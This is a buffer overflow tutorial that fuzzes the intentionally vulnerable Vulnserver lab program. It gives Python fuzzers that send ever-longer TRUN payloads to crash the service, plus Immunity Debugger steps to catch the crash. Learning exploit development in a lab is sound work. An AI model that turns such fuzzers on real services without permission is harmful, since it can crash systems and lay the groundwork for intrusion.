Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debugger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Start the vulnserver program on the Windows host.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0.0.XX 9999

3. Write the Python fuzzer test script on Kali Linux.

#!/usr/bin/python
import socket
import sys

# Build a list of payloads of increasing length: "A", then 100, 300, ..., 5900 bytes of "A".
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

# Send each payload as the argument of the TRUN command, one connection per payload.
# The loop simply continues after the target dies; the last length printed is the crash size.
for string in buffer:
    print("Fuzzing vulnserver with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.XX', 9999))
    s.send(('TRUN /.:/' + string).encode())
    s.close()

Make the script executable and run fuzzer.py.

chmod +x fuzzer.py
./fuzzer.py

Vulnserver crashes when it receives the 5900-byte payload.
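The script above only reports the sizes it sent; it does not notice when the target stops answering. As an added example (not the original post's script), the fuzzer below generalises the same increasing-length approach with crash detection: each send expects a reply, and a refused, reset or silently closed connection is treated as the crash point. The host value is a placeholder, the TRUN prefix and port 9999 are taken from the post, and the assumption that vulnserver sends a banner and answers a short TRUN command is stated in the comments. The simulated sender lets the loop be exercised offline against a constructed target whose buffer holds a known number of bytes.

```python
#!/usr/bin/env python3
"""Incremental-length fuzzer with crash detection.
Added example, not the original post's script.
Target assumptions: vulnserver's TRUN command on TCP 9999 (as in the post);
HOST is a placeholder that must be replaced with the Windows host."""
import socket

HOST = "10.0.0.XX"        # placeholder: address of the host running vulnserver
PORT = 9999               # vulnserver's listening port (from the post)
PREFIX = b"TRUN /.:/"     # command prefix used by the original fuzzer


def payload_lengths(start=100, step=200, count=30):
    """Same size sequence as the original script: 100, 300, ..., 5900 bytes."""
    return [start + step * i for i in range(count)]


def send_one(length, host=HOST, port=PORT, timeout=3.0):
    """Send one TRUN payload of `length` A's and wait for an answer.
    Raises OSError (refused, reset, timeout) or ConnectionError (empty reply)
    when the service is no longer answering, which is how a crash shows up.
    Assumption: vulnserver sends a banner on connect and replies to TRUN."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                       # consume the banner
        s.sendall(PREFIX + b"A" * length)
        reply = s.recv(1024)               # a dead server closes the socket (b"") or resets
        if not reply:
            raise ConnectionError("target closed the connection without replying")


def fuzz(sender, lengths):
    """Call sender(length) for each length in order and stop at the first failure.
    Returns a dict with the length that triggered the failure ('crashed_at',
    None if every send was answered) and the largest length that was answered."""
    last_ok = None
    for length in lengths:
        try:
            sender(length)
        except OSError as exc:             # ConnectionError and socket.timeout are OSErrors
            return {"crashed_at": length, "last_ok": last_ok, "error": str(exc)}
        last_ok = length
    return {"crashed_at": None, "last_ok": last_ok, "error": None}


def simulated_sender(limit):
    """Constructed stand-in for a target whose buffer holds `limit` bytes:
    any longer payload 'crashes' it, so the fuzzer can be tested offline."""
    def send(length):
        if length > limit:
            raise ConnectionResetError("simulated target crashed")
    return send


if __name__ == "__main__":
    # Offline demonstration against the constructed target.
    print(fuzz(simulated_sender(5000), payload_lengths()))
    # Against the real host, replace HOST above and use:
    #   print(fuzz(send_one, payload_lengths()))
```

The result names both the first length that went unanswered and the last one that was answered, so the crash size is bracketed to within one step (200 bytes here) without rerunning the loop; with the real sender the same dict tells you the size at which vulnserver stopped responding.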

Immunity Debugger

[Screenshot: Immunity Debugger GUI]

Open vulnserver in Immunity Debugger, or attach the debugger to the already running vulnserver process.

Run fuzzer.py from Kali Linux.

./fuzzer.py

Vulnserver eventually crashes, and this time the crash is caught in Immunity Debugger.
